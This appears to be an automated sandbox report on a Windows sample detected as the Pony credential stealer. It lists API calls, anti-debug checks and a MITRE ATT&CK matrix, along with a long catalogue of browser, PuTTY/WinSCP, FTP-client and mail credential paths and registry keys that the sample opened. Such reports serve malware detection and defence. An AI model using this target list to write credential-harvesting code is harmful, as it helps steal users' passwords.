Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Code function: 0_2_00402514 LoadLibraryA,GetProcAddress,

0_2_00402514

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_0040FC92 mov eax, dword ptr fs:[00000030h]	0_2_0040FC92
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_004E00EB push dword ptr fs:[00000030h]	0_2_004E00EB
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_004F00DB push dword ptr fs:[00000030h]	0_2_004F00DB

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Code function: 0_2_00410949 SetUnhandledExceptionFilter,RevertToSelf,

0_2_00410949

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Code function: 0_2_00410686 lstrcmpiA,LogonUserA,lstrlenA,LCMapStringA,LogonUserA,LogonUserA,LoadUserProfileA,ImpersonateLoggedOnUser,RevertToSelf,UnloadUserProfile,CloseHandle,

0_2_00410686

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Code function: 0_2_00404752 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00404752

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Code function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_0040487D

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Code function: 0_2_0041087F OleInitialize,GetUserNameA,

0_2_0041087F

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Code function: 0_2_0040487D GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_0040487D

Stealing of Sensitive Information

Yara detected Pony

Source: Yara match	File source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\SiteDesigner\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\BlazeFtp\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_CURRENT_USER\Software\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\FTPInfo\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBIT	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\NetSarang\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_CURRENT_USER\Software\AceBIT	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\FTPInfo\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 9\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Program Files (x86)\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\BlazeFtp\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\INSoftware\NovaFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Program Files (x86)\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\NetSarang\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\Setup	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\AceBIT\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\AceBIT\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\BlazeFtp\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\AceBIT\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Windows\32BitFtp.ini	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\3D-FTP\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\NetSarang\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: HKEY_LOCAL_MACHINE\Software\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Windows\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.dat	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword		0_2_0040EE6F
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword		0_2_0040EE6F

Source: Yara match

File source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTR

Remote Access Functionality

Yara detected Pony

Source: Yara match	File source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	2 Valid Accounts	2 Valid Accounts	2 Valid Accounts	2 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	21 Access Token Manipulation	1 Virtualization/Sandbox Evasion	2 Credentials in Registry	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	21 Access Token Manipulation	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
